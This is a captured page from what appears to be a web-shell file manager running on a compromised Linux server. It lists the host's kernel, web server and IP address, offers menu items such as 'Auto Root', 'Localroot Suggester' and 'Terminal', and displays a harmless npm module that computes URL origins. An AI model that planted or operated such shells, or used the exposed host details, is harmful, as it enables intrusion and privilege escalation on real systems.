Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 52.14.238.102
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
original /
Delete
Unzip
Name
Size
Permission
Date
Action
LICENSE
1.09
KB
-rw-r--r--
1985-10-26 08:15
README.md
1.75
KB
-rw-r--r--
1985-10-26 08:15
index.js
1.02
KB
-rw-r--r--
1985-10-26 08:15
package.json
1.71
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
'use strict'; var parse = require('url-parse'); /** * Transform an URL to a valid origin value. * * @param {String|Object} url URL to transform to it's origin. * @returns {String} The origin. * @api public */ function origin(url) { if ('string' === typeof url) url = parse(url); // // 6.2. ASCII Serialization of an Origin // http://tools.ietf.org/html/rfc6454#section-6.2 // if (!url.protocol || !url.hostname) return 'null'; // // 4. Origin of a URI // http://tools.ietf.org/html/rfc6454#section-4 // // States that url.scheme, host should be converted to lower case. This also // makes it easier to match origins as everything is just lower case. // return (url.protocol +'//'+ url.host).toLowerCase(); } /** * Check if the origins are the same. * * @param {String} a URL or origin of a. * @param {String} b URL or origin of b. * @returns {Boolean} * @api public */ origin.same = function same(a, b) { return origin(a) === origin(b); }; // // Expose the origin // module.exports = origin;